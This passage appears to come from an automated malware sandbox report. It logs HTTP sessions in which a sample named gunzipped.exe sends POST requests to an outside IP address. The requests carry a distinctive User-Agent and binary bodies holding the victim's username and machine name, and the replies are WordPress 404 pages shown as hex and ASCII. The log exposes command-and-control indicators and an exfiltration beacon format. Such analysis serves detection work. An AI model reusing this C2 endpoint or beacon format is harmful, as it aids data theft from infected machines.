74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:17:42.471549034 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:17:42.471566916 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:17:42.471585035 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:17:42.471604109 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:17:42.471621990 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:17:42.471642017 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:17:42.471657991 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:17:42.471676111 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:17:42.471700907 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49745	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:17:42.872386932 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:17:43.080470085 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:17:43.987329960 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:17:42 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:17:43.987350941 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:17:43.987368107 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:17:43.987384081 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:17:43.987399101 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:17:43.987415075 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:17:43.987431049 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:17:43.987447023 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:17:43.987462044 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:17:43.987479925 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49746	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:17:44.338890076 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:17:44.542341948 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:17:45.475289106 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:17:44 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
